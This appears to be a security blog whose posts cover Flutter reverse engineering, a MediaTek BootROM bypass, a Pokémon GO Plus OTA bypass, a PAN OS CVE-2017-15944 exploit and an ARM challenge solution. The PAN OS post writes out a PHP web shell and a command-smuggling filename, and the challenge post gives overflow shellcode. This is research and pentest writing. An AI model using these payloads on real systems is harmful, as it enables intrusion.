Reverse Engineering a Flutter app by recompiling Flutter Engine

It is not easy to reverse engineer a release version of a flutter app because the tooling is not available and the flutter engine itself changes rapidly. As of now, if you are lucky, you can dump the classes and method names of a flutter app using darter or Doldrums if the app was built with a specific version of Flutter SDK.

If you are extremely lucky, which is what happened to me the first time I needed to test a Flutter App: you don’t even need to reverse engineer the app. If the app is very simple and uses a simple HTTPS connection, you can test all the functionalities using intercepting proxies such as Burp or Zed Attack Proxy. The app that I just tested uses an extra layer of encryption on top of HTTPS, and that’s the reason that I need to do actual reverse engineering.

In this post, I will only give examples for the Android platform, but everything written here is generic and applicable to other platforms. The TLDR is: instead of updating or creating a snapshot parser, we just recompile the flutter engine and replace it in the app that we targeted.

Flutter compiled app

Currently several articles and repositories that I found regarding Flutter reverse engineering are:

The main code consists of two libraries libflutter.so (the flutter engine) and libapp.so (your code). You may wonder: what actually happens if you try to open a libapp.so (Dart code that is AOT compiled) using a standard disassembler. It’s just native code, right? If you use IDA, initially, you will only see this bunch of bytes.

If you use other tools, such as binary ninja which will try to do some linear sweep, you can see a lot of methods. All of them are unnamed, and there are no string references that you can find. There is also no reference to external functions (either libc or other libraries), and there is no syscall that directly calls the kernel (like Go)..

With a tool like Darter dan Doldrums, you can dump the class names and method names, and you can find the address of where the function is implemented. Here is an example of a dump using Doldrums. This helps tremendously in reversing the app. You can also use Frida to hook at these addresses to dump memory or method parameters.

The snapshot format problem

The reason that a specific tool can only dump a specific version of the snapshot is: the snapshot format is not stable, and it is designed to be run by a specific version of the runtime. Unlike some other formats where you can skip unknown or unsupported format, the snapshot format is very unforgiving. If you can’t parse a part, you can parse the next part.

Basically, the snapshot format is something like this: <tag> <data bytes> <tag> <data bytes> … There is no explicit length given for each chunk, and there is no particular format for the header of the tag (so you can’t just do a pattern match and expect to know the start of a chunk). Everything is just numbers. There is no documentation of this snapshot, except for the source code itself.

In fact, there is not even a version number of this format. The format is identified by a snapshot version string. The version string is generated from hashing the source code of snapshot-related files. It is assumed that if the files are changed, then the format is changed. This is true in most cases, but not always (e.g: if you edit a comment, the snapshot version string will change).

My first thought was just to modify Doldrums or Darter to the version that I needed by looking at the diff of Dart sources code. But it turns out that it is not easy: enums are sometimes inserted in the middle (meaning that I need to shift all constants by a number). And dart also uses extensive bit manipulation using C++ template. For example, when I look at Doldums code, I saw something like this:

def decodeTypeBits(value):
       return value & 0x7f

I thought I can quickly check this constant in the code (whether it has changed or not in the new version), the type turns out to be not a simple integer.

class ObjectPool : public Object {
 using TypeBits = compiler::ObjectPoolBuilderEntry::TypeBits;
}
struct ObjectPoolBuilderEntry {
  using TypeBits = BitField<uint8_t, EntryType, 0, 7>;
}

You can see that this Bitfield is implemented as BitField template class. This particular bit is easy to read, but if you see kNextBit, you need to look back at all previous bit definitions. I know it’s not that hard to follow for seasoned C++ developers, but still: to track these changes between versions, you need to do a lot of manual checks.

My conclusion was: I don’t want to maintain the Python code, the next time the app is updated for retesting, they could have used a newer version of Flutter SDK, with another snapshot version. And for the specific work that I am doing: I need to test two apps with two different Flutter versions: one for something that is already released in the app store and some other app that is going to be released.

Rebuilding Flutter Engine

The flutter engine (libflutter.so) is a separate library from libapp.so (the main app logic code), on iOS, this is a separate framework. The idea is very simple:

  • Download the engine version that we want
  • Modify it to print Class names, Methods, etc instead of writing our own snapshot parser
  • Replace the original libflutter.so library with our patched version
  • Profit

The first step is already difficult: how can we find the corresponding snapshot version? This table from darter helps, but is not updated with the latest version. For other versions, we need to hunt and test if it has matching snapshot numbers. The instruction for recompiling the Flutter engine is here, but there are some hiccups in the compilation and we need to modify the python script for the snapshot version. And also: the Dart internal itself is not that easy to work with.

Most older versions that I tested can’t be compiled correctly. You need to edit the DEPS file to get it to compile. In my case: the diff is small but I need to scour the web to find this. Somehow the specific commit was not available and I need to use a different version. Note: don’t apply this patch blindly, basically check these two things:

  • If a commit is not available, find nearest one from the release date
  • If something refers to a _internal you probably should remove the _internal part.
diff --git a/DEPS b/DEPS
index e173af55a..54ee961ec 100644
--- a/DEPS
+++ b/DEPS
@@ -196,7 +196,7 @@ deps = {
    Var('dart_git') + '/dartdoc.git@b039e21a7226b61ca2de7bd6c7a07fc77d4f64a9',

   'src/third_party/dart/third_party/pkg/ffi':
-   Var('dart_git') + '/ffi.git@454ab0f9ea6bd06942a983238d8a6818b1357edb',
+   Var('dart_git') + '/ffi.git@5a3b3f64b30c3eaf293a06ddd967f86fd60cb0f6',

   'src/third_party/dart/third_party/pkg/fixnum':
    Var('dart_git') + '/fixnum.git@16d3890c6dc82ca629659da1934e412292508bba',
@@ -468,7 +468,7 @@ deps = {
   'src/third_party/android_tools/sdk/licenses': {
      'packages': [
        {
-        'package': 'flutter_internal/android/sdk/licenses',
+        'package': 'flutter/android/sdk/licenses',
         'version': 'latest',
        }
      ],

Now we can start editing the snapshot files to learn about how it works. But as mentioned early: if we modify the snapshot file: the snapshot hash will change, so we need to fix that by returning a static version number in third_party/dart/tools/make_version.py. If you touch any of these files in VM_SNAPSHOT_FILES, change the line snapshot_hash = MakeSnapshotHashString() with a static string to your specific version.

What happens if we don’t patch the version? the app won’t start. So after patching (just start by printing a hello world) using OS::PrintErr("Hello World") and recompiling the code, we can test to replace the .so file, and run it.

I made a lot of experiments (such as trying to FORCE_INCLUDE_DISASSEMBLER), so I don’t have a clean modification to share but I can provide some hints of things to modify:

  • in runtime/vm/clustered_snapshot.cc we can modify Deserializer::ReadProgramSnapshot(ObjectStore* object_store) to print the class table isolate->class_table()->Print()
  • in runtime/vm/class_table.cc we can modify void ClassTable::Print() to print more informations

For example, to print function names:

 const Array& funcs = Array::Handle(cls.functions());  
 for (intptr_t j = 0; j < funcs.Length(); j++) {
      Function& func = Function::Handle();
      func = cls.FunctionFromIndex(j);
      OS::PrintErr("Function: %s", func.ToCString());
}

Sidenote: SSL certificates

Another problem with Flutter app is: it won’t trust a user installed root cert. This a problem for pentesting, and someone made a note on how to patch the binary (either directly or using Frida) to workaround this problem. Quoting TLDR of this blog post:

  • Flutter uses Dart, which doesn’t use the system CA store
  • Dart uses a list of CA’s that’s compiled into the application
  • Dart is not proxy aware on Android, so use ProxyDroid with iptables
  • Hook the session_verify_cert_chain function in x509.cc to disable chain validation

By recompiling the Flutter engine, this can be done easily. We just modify the source code as-is (third_party/boringssl/src/ssl/handshake.cc), without needing to find assembly byte patterns in the compiled code.

Obfuscating Flutter

It is possible to obfuscate Flutter/Dart apps using the instructions provided here. This will make reversing to be a bit harder. Note that only the names are obfuscated, there is no advanced control flow obfuscation performed.

Conclusion

I am lazy, and recompiling the flutter engine is the shortcut that I take instead of writing a proper snapshot parser. Of course, others have similar ideas of hacking the runtime engine when reversing other technologies, for example, to reverse engineer an obfuscated PHP script, you can hook eval using a PHP module.

Dissecting a MediaTek BootROM exploit

A bricked Xiaomi phone led me to discover a project in Github that uses a MediaTek BootROM exploit that was undocumented. The exploit was found by Xyz, and implemented by Chaosmaster. The initial exploit was already available for quite a while. Since I have managed to revive my phone, I am documenting my journey to revive it and also explains how the exploit works. This exploit allows unsigned code execution, which in turn allows us to read/write any data from our phone.

For professionals: you can just skip to how the BootROM exploit works (spoiler: it is very simple). This guide will try to guide beginners so they can add support for their own phones. I want to show everything but it will violate MediaTek copyright, so I will only snippets of decompilation of the boot ROM.

Bricking my Phone and understanding SP Flash Tool

I like to use Xiaomi phones because it’s relatively cheap, has an easy way to unlock the bootloader, and the phone is easy to find here in Thailand. With an unlocked bootloader, I have never got into an unrecoverable boot loop, because I can usually boot into fastboot mode and just reflash with the original ROM. I usually buy a phone with Qualcomm SOC, but this time I bought Redmi 10X Pro 5G with MediaTek SOC (MT6873 also known as Dimensity 800). But it turns out: you can get bricked without the possibility to enter fastboot mode.

A few years ago, it was easy to reflash a Mediatek phone: enter BROM mode (usually by holding the volume up button and plugging the USB when the phone is off), and use SP Flash Tool to overwrite everything (including boot/recovery partition). It works this way: we enter BROM mode, the SP Flash Tool will upload DA (download agent) to the phone, and SP Flash Tool will communicate with the DA to perform actions (erase flash, format data, write data, etc).

But they have added more security now: when I tried flashing my phone, it displays an authentication dialog. It turns out that this is not your ordinary Mi Account dialog, but you need to be an Authorized Mi Account holder (usually from a service center). It turns out that just flashing a Mediatek phone may enter a boot loop without the possibility of entering fastboot mode. Quoting from an XDA article:

The developers who have been developing for the Redmi Note 8 Pro have found that the device tends to get bricked for a fair few reasons. Some have had their phone bricked when they were flashing to the recovery partition from within the recovery, while others have found that installing a stock ROM through fastboot on an unlocked bootloader also bricks the device

Xiaomi needs a better way to unbrick its devices instead of Authorized Mi Accounts

I found one of the ROM modders that had to deal with a shady person on the Internet using remote Team Viewer to revive his phone. He has some explanation about the MTK BootROM security. To summarize: BROM can have SLA (Serial Link Authorization), DAA (Download Agent Authorization), or both. SLA prevents loading DA if we are not authorized. And DA can present another type of authentication. Using custom DA, we can bypass the DA security, assuming we can bypass SLA to allow loading the DA.

When I read those article I decided to give up. I was ready to let go of my data.

MTK Bypass

By a stroke of luck, I found a bypass for various MTK devices was published just two days after I bricked my Phone. Unfortunately: MT6873 is not yet supported. To support a device, you just need to edit one file (device.c), which contains some addresses. Some of these addresses can be found from external sources (such as from the published Linux kernel for that SOC), but most can’t be found without access to the BootROM itself. I tried reading as much as possible about the BROM protocol. Some of the documentation that I found:

Another luck came in a few days later: Chaosmaster published a generic payload to dump the BootROM. I got lucky: the generic payload works immediately on the first try on my phone and I got my Boot ROM dump. Now we need to figure out what addresses to fill in. At this point, I don’t have another ROM to compare, so I need to be clever in figuring out these addresses. We need to find the following:

  • send_usb_response
  • usbdl_put_dword
  • usbdl_put_data
  • usbdl_get_data
  • uart_reg0
  • uart_reg1
  • sla_passed
  • skip_auth_1
  • skip_auth_2

From the main file that uses those addresses we can see that:

  • uart_reg0 and uart_reg1 are required for proper handshake to work. These addresses can be found on public Linux kernel sources.
  • usbdl_put_dword and usbdl_put_data is used to send data to our computer
  • usbdl_get_data is used to read data from computer
  • sla_passed, skip_auth_1 and skip_auth_2, are the main variables that we need to overwrite so we can bypass the authentication

We can start disassembling the firmware that we obtain fro the generic dumper. We need to load this to address 0x0. Not many strings are available to cross-reference so we need to get creative.

Somehow generic_dump_payload can find the address for usb_put_data to send dumped bytes to the Python script. How does it know that? The source for generic_dump_payload is is available in ChaosMaster’s repository. But I didn’t find that information sooner so I just disassembled the file. This is a small binary, so we can reverse engineer it easily using binary ninja. It turns out that it does some pattern matching to find the prolog of the function: 2d e9 f8 4f 80 46 8a 46. Actually, it searches for the second function that has that prolog.

Pattern finder in generic_dump_payload

Now that we find the send_word function we can see how sending works. It turns out that it sends a 32-bit value by sending it one byte at a time. Note: I tried continuing with Binary Ninja, but it was not easy to find cross-references to memory addresses on a raw binary, so I switched to Ghidra. After cleaning up the code a bit, it will look something like this:

What generic_dump_payload found

Now we just need to find the reference to function_pointers and we can find the real address for sendbyte. By looking at related functions I was able to find the addresses for: usbdl_put_dword, usbdl_put_data, usbdl_get_data. Note that the exploit can be simplified a bit, by replacing usbdl_put_dword by a call to usbdl_put_data so we get 1 less address to worry about.

The hardest part for me was to find send_usb_response to prevent a timeout. From the main file, I know that it takes 3 numeric parameters (not pointers), and this must be called somewhere before we send data via USB. This narrows it down quite a lot and I can find the correct function.

Now to the global variables: sla_passed, skip_auth_1, and skip_auth_2. When we look at the main exploit in Python, one of the first things that it does is to read the status of the current configuration. This is done by doing a handshake then retrieve the target config.

Target config

There must be a big “switch” statement in the boot ROM that handles all of these commands. We can find the handshake bytes (A0 0A 50 05) to find the reference to the handshake routine (actually found two of them, one for USB and one for UART). From there we can find the reference to the big switch statement.

The handshake

You should be able to find something like this: after handshake it starts to handle commands

And the big switch should be clearly visible.

Switch to handle various commands

Now that we found the switch, we can find the handler for command 0xd8 (get target config). Notice in python, the code is like this:

Notice the bit mask

By looking at the bitmask, we can conclude the name of the functions that construct the value of the config. E.g: we can name the function that sets the secure boot to is bit_is_secure_boot. Knowing this, we can inspect each bit_is_sla and bit_is_daa

we can name the functions from the bit that it sets

For SLA: we need to find cross-references that call bit_is_sla, and we can see that another variable is always consulted. If SLA is not set, or SLA is already passed, we are allowed to perform the next action.

finding sla_passed

Now we need to find two more variables for passing DAA. Looking at bit_is_daa, we found that at the end of this function, it calls a routine that checks if we have passed it. These are the last two variables that we are looking for.

How the BootROM Exploit Works

The exploit turns out very simple.

  1. We are allowed to upload data to a certain memory space
  2. The handler for USB control transfer blindly index a function pointer table

Basically it something like this: handler_array[value*13]();

But there are actually some problems:

  • The value for this array is unknown, but we know that most devices will have 0x100a00 as one of the elements
  • We can brute force the value for USB control transfer to invoke the payload
  • We may also need to experiment with different addresses (since not all device has 0x100a00 as an element that can be used)

Another payload is also provided to just restart the device. This will make it easy to find the correct address and control value.

Closing Remarks

Although I was very upset when my phone got bricked, the experience in solving this problem has been very exciting. Thank you to Xyz for finding this exploit, and ChaosMaster for implementing it, simplifying it, and also for answering my questions and reviewing this post.

Reverse Engineering Pokémon GO Plus Part 2: OTA Signature Bypass

It has been almost 6 months since I published my Pokemon Go Plus finding and so far no one has published their Pokemon Go Plus Key. One of the reason is the difficulty in extracting the key from OTP (one time programmable) memory that requires precision soldering. Few weeks after I wrote my article, I posted an idea to /r/pokemongodev to extract a Pokemon Go Plus key using over the air (OTA) update.

The idea was based on two things:

  • We can flash any image using SPI Flasher, and there is no signature check, we just need a correct checksum.
  • The SPI flash contains two copies of the same firmware (there are 2 firmware banks). This is important for OTA: in case the firmware was not transferred correctly, the bootloader (located in OTP) will boot the other valid firmware

And the plan was this:

  • Create our new custom firmware
  • Flash the new firmware to the Pokemon Go Plus over the air to Bank 1. At this point there will be two firmware: our firmware and the pokemon go plus firmware
  • Extract the key via BLE (Bluetooth Low Energy) using the new firmware
  • Restore the original firmware by sending a special request to the new firmware. This is done by reading the original firmware on bank 2 and overwriting our firmware in Bank 1.
The plan

Unfortunately, I don’t have time to implement it. I don’t have DA14580 development board so I won’t be able to debug it properly via JTAG. I don’t feel like buying 40 USD for a board that I will only use for this project. I got about 30 USD in donations which I use to buy another Pokemon Go Plus clone, it has the same Bluetooth MAC address. (Note that money wasn’t really the problem, I just like to spend it on something that I like, for example, I just recently bought Nvidia Jetson Nano and a Stereo Microscope)

Two months ago a Reddit user jesus-bamford contacted me, mentioning that he will implement the idea I proposed. Everything seems to work according to plan:

  • He can create a firmware that can extract the key from OTP
  • He can write his firmware using SPI flasher
  • He can send his firmware over the air (using Android App provided by Dialog Semiconductor)

But this is where the good news ends: if the firmware is written using OTA, it won’t boot. The bootloader thinks the firmware is invalid and it will boot the original copy of the Pokemon Go Plus firmware. He found out that there is an extra check in the Software Update that was added, that is not in the source code provided in the DA14580 SDK. But he can’t figure out what is the check or how to bypass it.

During the Songkran Holiday in Thailand, I have some free time so I tried to reverse engineer the boot loader. He is right, there is an extra check added:

  • When the update process is started, a flag is set to indicate that this firmware image is not yet valid. In case of a failed update, the bootloader can bot the other valid firmware. During this process, an SHA256 hash is initialized
  • For every incoming data that is written to SPI flash, the hash is updated
  • At the end of the update, a signature check is performed based on the SHA256 AND some data from OTP. If everything is valid, then the firmware image is set to valid.

I didn’t go into detail on the signature check algorithm, I know it uses big number computations, probably RSA but I didn’t verify it. I also don’t feel that I will find a bug there. What’s important is what happens next: if the signature is valid then a flag is set to indicate that the image is valid.

So to be clear:

  • If we modify a firmware using SPI flasher, we just overwrite existing firmware and the valid flag is kept on
  • If we modify a firmware using OTA, we need it to be set as valid at the end of the update process

I know one thing for sure: the update process also requires a specific key from the OTP area. So if there was ever going to be an update from Niantic, that update requires a connection to their server to get a special key from them.

So let’s go back and see if there is another way to set the image to be valid. This is the original source code inside app_spotar_img_hdlr.c in the DA14580 SDK:

The compiled binary has an extra call to update the SHA256, but its not important for now. Lets focus on just this one line:

ret = spi_flash_write_data (spota_all_pd, (spota_state.mem_base_add + spota_state.suota_img_idx), spota_state.suota_block_idx);

The variable spota_all_pd contains data sent from the updater app. The second parameter specifies where to write the data (the address in SPI block) and the third parameter is the size.

Visually, we can see that mem_base_add points to the beginning address in the SPI flash, and suota_img_idx points to the current block.

When the write is succesful we increment the address through:

spota_state.suota_img_idx += spota_state.suota_block_idx;

It seems to be fine. I looked for possible buffer overflows for code execution and I couldn’t find one. But what if we can modify spota_state.mem_base_add then we will be able to write anywhere in the SPI flash, including in the image valid flag.

I found a function called: app_spotar_read_mem which is supposed to be called after we finished writing all of the data. This is also where the final check is performed before writing,

This code is very strange: instead of using a temporary variable it uses: spota_state.mem_base_add to store a temporary value to be used for setting spota_state.suota_image_bank. When spota_state.mem_base_add is greater than 2 this function will fail.

And this is exactly what we need: a way to modify mem_base_add. So what we need to do is:

  • Send data via OTA as usual, and this will be written to SPI as expected
  • Before sending the last part of the data, send a request such that app_spotar_read_mem is called, and set the mem_base_add to the beginning of our firmware header, where the valid flag is
  • Send the last part of the data, which will overwrite the firmware header. This last data is the header that we want
Moving mem_base_add up

And that’s the idea. Jesus-bamford did a great job implementing this idea and I was so happy that it works. Here is his software in action. The firmware is already open source at:

https://github.com/Jesus805/PGP_Suota

But the updater is not yet ready for release. He is currently reimplementing the OTA software for Android because his current code is based on the SDK code. When he is finished, anyone should be able to extract their Pokemon Go Plus key without opening it.

I know that I should probably wait until his work is finished before publishing this, but I am also hoping that others can help him. May be implement the update for different iOS, or start working on implementation of Pokemon Go Plus for other devices.

It might also be possible to implement the Pokemon Go Plus using EdXposed (this is a fork of XPosed that works with Pokemon Go) or by adding a library to the iOS version that intercepts the BLE API calls.

An alternative way to exploit CVE-2017-15944 on PAN OS 6.1.0

On the beginning of 2018 during a pentest work, I found a firewall that has that should be exploitable using the bug CVE-2017-15944, but somehow the exploits I found doesn’t work on the last step: we never got the code to be executed by cron. In the end I found out the reason: It turns out there was an attacker already connected to the target that halts the cron script execution so other attackers won’t be able to execute the same attack. 

I will explain an alternative cron script that can be used for exploitation in the presence of another attacker. This exploit has been verified to work on PAN OS 6.1.0, but may work on other versions too (I don’t have other devices or firmware image to check this).

I will not explain in detail how the original exploit works, there is a lot of explanation that you can already read in the web (for example this Russian article is very good, you can use Google Translate to read it in English). I have verified that the auth bypass and file creation works on my target before continuing.

On the final step of the exploit, all the articles and exploits that I read will use genidex.sh script. The problem with this is: this script will check if another instance of it is still running, and if it is, then it will just exit, preventing us from performing an attack when another attacker is still connected.

On PAN OS 6.1.0 (the only version that I can verify that it works) there is another script called core_compress, which is a python script. Just like genindex.sh, this script is also executed every 15 minutes as root.

This script searches for the following directories:

Then it compresses the *.core files on those directories using “tar” 

The problem is: the file names are not escaped

So the exploit is quite simple: make a simple PHP payload:

echo <?php system($_GET["c"]);?>|base64 # PD9waHAgc3lzdGVtKCRfR0VUWyJjIl0pOz8+Cg==

and write it to a file  (for example /var/appweb/htdocs/api/j.php). This can be done by creating a file that will be executed like this:

echo 
PD9waHAgc3lzdGVtKCRfR0VUWyJjIl0pOz8+Cg==|base64 -d >/var/appweb/htdocs/api/j.php

We need to have that string as a filename, but we can’t have a slash (/) in a filename on Linux, so we need to escape this. My method is to use ${PATH:0:1}, using the fact the $PATH variable always has a slash as the first character. The final exploit is just to create a file
(using the same bug as the other exploit) with the following name: 

/var/cores/$(echo 
PD9waHAgc3lzdGVtKCRfR0VUWyJjIl0pOz8+Cg==|base64 -d >${PATH:0:1}var${PATH:0:1}appweb${PATH:0:1}htdocs${PATH:0:1}api${PATH:0:1}j.php).core

Of course it would a better Idea to start from last path ( /opt/lpfs/var/cores) to first (/var/cores) when constructing an exploit, so if the last one failed we can try with the next path.

So that’s all. In maybe 90% of cases most exploit will work out of the box, but sometimes you need to really understand what it does and fix it or find a workaround for a case like this. As a note: I have verified that on latest PAN OS, they fixed a lot of things including this cron script (but I don’t know in which particular version this bug was fixed).

Solving Second Bevx Challenge 2018

The Bevx challenge is a security challenge from Beyond Security for their Bevx conference. I didn’t know about the first challenge, and since I don’t use Twitter every day, I almost missed this second challenge. I only found out about this since my friend shared the Twitter link. It seems that the tweet causes a bit of confusion because several people asked me: where is the challenge link?

The challenge link is in the picture:

Here it is zoomed in

And this is the link, so you don’t have to retype that: https://www.beyondsecurity.com/bevxcon/bevx-challenge-10

It also contains a hint: the red text says “ARM buffer overflow”.

The Challenge

Here is the challenge text:

The binary is a ‘server’ which expects incoming connections to it when an incoming connection occurs and a certain ‘protocol’ is implemented it will print out ‘All your base’ and exit. Your challenge is to write an exploit that will cause the program to print out ‘Belong to us!’.

We are given an ARM binary, which we can check using file :

$ file main
main: ELF 32-bit LSB executable, ARM, EABI5 version 1 (SYSV), statically linked, for GNU/Linux 2.6.32, BuildID[sha1]=da5353188930ee93a16329bee21858fde73a11d2, stripped

Trying to run this in Raspberry Pi doesn’t work (presumably because of the memory addresses that they chose for the binary, which has something to do with the main challenge part). Fortunately, I have a Pine64 and it works there. I also tried using qemu-arm-static, and it also works fine:

 qemu-arm-static ./main

We can even trace the execution:

qemu-arm-static  -strace -d in_asm,cpu  ./main 2> log.txt

The binary is statically linked and stripped. It means that you will not be able to find the function names in the ELF file. The Qemu output helps me to quickly identify some syscalls.

To get the complete list of syscall, we can look at Linux kernel source file arch/arm/include/asm/unistd.h.

Basically, the server will create a listening socket, accept a connection, allocate memory using mmap at a fixed address (0xdada0000), receive some data to 0xdada0000 (maximum 256 bytes), checks if it satisfies certain requirements, then copies the message to 128 bytes stack, then prints the string “All your base”.

The Protocol and Filter

The first check that we need to get through is the headers: there are 8 bytes that we need to use to get through the first check. This is quite easy, it just compares the first 4 bytes with the result of a function call, and the next 4 bytes from another function call. Without understanding the function we can find these values easily using Qemu.

First we just send some string “AAAAAAAAAAAA”, the program will just exit. We can check the value when the comparison was made.

Now sending: “;*k%:ZnAAAA” (3b2a6b25 3a5a6e 41414141) to the server will make the server print “All Your Base” and then exit.

The next check is a bit more complicated, but the constants in the listing (0xF0C0C0 0xE08080 ) helps a lot in finding the algorithm. I admit that I was lucky to have worked with UTF-8 related stuff and Unicode in general so that looking at the constant already gives me a vague idea that it might use UTF-8. And Google is always available to confirm this.

Google search shows that it is used in UTF-8 validity checking. If the received characters are a valid UTF-8 string then it will print “All Your Base” and then exit (the string AAAA happens to be a valid UTF-8 string). Sending a string that is not a valid UTF-8 sequence will cause the program to exit without print “All your base”.

Looking at the first C code in the search result shows that the code is very similar to the one in the disassembly. I didn’t check the detail of the validation code if it is exactly the same, but it reminds me of an article in Phrack Magazine: UTF-8 Shellcode (for Intel x86 Architecture) (please read this to understand about valid UTF-8 byte sequence). Here is an excerpt from the article about valid sequences:

At this point, I did some testing to send valid and invalid UTF-8 sequences, and it seems to work as expected: byte sequences that are not a valid UTF-8 code are rejected, the server will just exit without printing “All Your Base”.

Jump to where?

So I moved to the next step: the buffer overflow part. Sending long strings of “HEADER” + “AAAAAA…” will make it crash and the PC is at 0x41414141. So the minimum payload that I need to send to make it crash is:

ch1 = "3b2a6b25".decode("hex")
ch2 = "3a5a6e01".decode("hex")
r2 = "XXXX"
r3 = "YYYY"
ip = "AAAA"

payload = ch1 + ch2 + "A"* 128 + r2 + r3 + ip

It means that I can change the register r2, r3 and ip. At this point, I thought: well, this should easy. But it turns out that the addresses chosen by the programmer are devious. Here is the content of the /proc/maps when the program is running:

00008000-00009000 r-xp 00000000 b3:01 125513             /home/yohanes/main
00d80000-00dfa000 r-xp 00008000 b3:01 125513             /home/yohanes/main
00e01000-00e03000 rwxp 00081000 b3:01 125513             /home/yohanes/main
da000000-da001000 rwxp 00088000 b3:01 125513             /home/yohanes/main
da001000-da024000 rwxp 00000000 00:00 0                  [heap]
dada0000-dada1000 rwxp 00000000 00:00 0
fffcf000-ffff0000 rwxp 00000000 00:00 0                  [stack]
ffff0000-ffff1000 r-xp 00000000 00:00 0                  [vectors]

Note that we are sending bytes in little endian, so sending 0x12 0x34 0x56 0x78 will make us jump to 0x78563412. If we overwrite 4 bytes of the PC, then we can’t go to address: 0xdada0000 (where our buffer is), since 0xda 0xda can never be a part of a valid UTF-8 sequence. We can’t jump directly to our code segment at 0x00d8XXYY - 0x00dfXXYY, because YY XX 0xd8 0x00 - YY XX 0xdf 0x00 also cannot form a valid UTF-8 sequence.

For the same reasoning, we also can’t go to 0x00e0XXYY or to the stack (0xff is not valid anywhere in UTF-8 sequence). We can only go to the heap, but I was not able to find anything there. I also thought that maybe the count of the received bytes can be made into an instruction that could help us jump to our buffer, but since we are limited to only receiving 256 bytes (so the count is maximum 0x0100), I couldn’t find any instruction that can work.

If we overwrite only 2 bytes of the instruction pointer (2 bytes of LSB), then we can go to 00 D8 XX YY (only addresses with 0xd8 prefix, not 0xd9-0xdf), but since we only overwrite 2 bytes of the return address, we can not control the rest of the stack, so we can’t do a deep ROP sequence. I used xrop to find possible sequences that I can use. This took me a while because somehow I missed the eor/blx gadget. This gadget is at 0xd87480. It is perfect I can control R2 and R3, and both of them can be XOR-ed together to create value 0xdada00xx

So I chose these numbers

r2 = "\xc6\x80\x5a\x17"
r3 = "\xe1\x80\x80\xcd"
ip = "\x80\x74" #Jump To d87480

# r2 ^ r3 will result in address 0xdada0027

I chose an odd address (LSB bit is 1) because I want to continue in THUMB mode, and I will also need the string “Belong to us!\x00” as part of the header, so at least I will need to start at address 0x17, but I thought: why not give an extra space in case I need it for storing something, since at this point I haven’t constructed the shellcode yet.

As a side note: here I realized that the UTF-8 filtering is not exactly the same as I expected, a sequence of “0xE1 0x80 0x80 0x74” should be acceptable, but somehow it was not acceptable at the end of the string. I didn’t check why since I can use the sequence at other parts of the string and I already got the constant that I am looking for.

The Shellcode

So now we need to write the shellcode. Having a debugger helps me a lot. Unfortunately, the gdb in my pine64 doesn’t support hardware breakpoint. So I made a minimal shellcode: ldr r0, [r0] since I know that at 0x0d812a0 r0 is set to 0, this will cause the program to crash because it referenced the address 0x0. When it crashes I can check the register values.

We can use R9, R10, or LR to reference something in the data section (by adding/subtracting value from that register). We can reference something in our buffer using R3. At this point, I have two options: reading the ARM Thumb instruction set reference to check the encoding of every instruction, or just try out my luck if the instruction will work. I did kind of both.

There are several options that I can do here to print: “Belong to us!”. I can directly call something in the code that uses “write” syscall or I can just change the existing “All your base” string in memory and resume execution to have the desired effect (the length of these two strings are the same). I think that the second method is “cleaner” since the application will exit cleanly.

Some of the first instruction that I checked was LDR Rx, [Rx] and STR Rx, [Rx]. And it turns out both will generate a valid UTF-8 sequence. SoI start by setting our register to the address of “Belong to us!”. This was the solution that I sent

movs r0, r0 
movs r0, r0
str r3, [r3]
movs r2, #8
strb r2, [r3]
ldr r3, [r3]

The first two instructions are just NOPs. I want to change the value 0xdada00xx (R3 value) to 0xdada0008 (the start of the string “Belong to us!”. I did this by: storing r3 to [r3] (which contains two NOPS (movs r0, r0), set r2 to #8, then store 1 byte to the [r3], this will overwrite the 0xdada00xx to 0xdada0008.

Just because I concentrated too much on LDR/STR. I made it too complicated since this much simpler code will also work and is a valid UTF-8 sequence.

subs r3, r3, #19

Next is to find the address of the allocated “All your base” string. This is referenced in: 0xd810e8 and the difference with 0xd81e34 (value of r9) is 0xd4c. This is the sequence that I found to subtract 0xd4c from r9. First I fill in 0xd, shift left by 4

movs r2, #0xd
lsls r2, r2, #8
adds r2, #0x4c
negs r2, r2
add r2, r2, r9
ldr r2, [r2] ; r2 now points to variable in heap
ldr r2, [r2] ; r2 now points to the allocated memory

Note: in my original submission I used two 4 bits left shifts for lsls to shift 8 bits because somehow I misread the documentation, I thought the shift immediate value was limited to 3 bits (0-7) when in fact it is 5 bits (0-31).

lsls r2, r2, #4
lsls r2, r2, #4

Now the rest is just to copy/overwrite the original string, the length of the string with NUL is 14 bytes, but we can copy 16 bytes easily without loop (only 4 loads + 4 stores).

ldr r4, [r3]
str r4, [r2]
ldr r4, [r3, 4]
str r4, [r2, 4]
adds r3, r3, #8
adds r2, r2, #8
ldr r4, [r3]
str r4, [r2]
ldr r4, [r3, 4]
str r4, [r2, 4]

I tried to use ldr r4, [r3, 8], but the generated code is not a valid UTF-8 sequence, so I just add 8 to r3 and r2.

And now the last part is to return to 0xd80fff, this is 0xe35 bytes from r9:

movs r2, #0xe
lsls r2, r2, #8
adds r2, #0x35
negs r2, r2
add r2, r2, r9
bx r2

So that’s it, the code will resume as if nothing happens, but now the string has been changed, and then it will close the socket cleanly.

This challenge was quite fun, it looks very simple at first, but is quite challenging. The code that I submitted works well but was not very optimized.

When the challenge was posted it was a Songkran Holiday in Thailand. I started working on this challenge more than 24 hours since it was posted so I was in hurry to send it quickly hoping that I might get the second or third prize. I was happily surprised when I found out that I was the first to send the correct solution.

Pentesting obfuscated Android App

I just finished pentesting a mobile app for a financial institution. I wrote this mainly as a note for future manual deobfuscation work. I have read a lot of articles and tested tools to deobfuscate Android apps but they are mostly for analyzing malware. Sometimes I need to deobfuscate and test app for the pentesting purpose.

Most of the time it doesn’t matter whether we are analyzing malware or analyzing some apps, but there are differences. For example, when testing a bank or financial app (with a team):

  • We can be sure that the app is not malicious, so we can safely use real device
  • The obfuscation is usually only up to DEX level, and will not patch the native code (Dalvik VM), because they want to ensure portability
  • We need to be able to run and test the app, not just extract strings to guess the capability of the app (on some malware analysis, you just need to extract strings)
  • Sometimes we need to modify and repack the app to bypass root checking, SSL pinning, etc and redistribute the APK to team members (you don’t usually repack a malware APK for testing)

You may ask: if this is for pentesting, why don’t you just ask for the debug version of the app? In many cases: yes we can have it, and it makes our job really easy. In some cases, due to a contract between the bank and the app vendor (or some other legal or technical reasons), they can only give a Play Store or iTunes URL.

I can’t tell you about the app that I tested, but I can describe the protection used.

Try automated tools

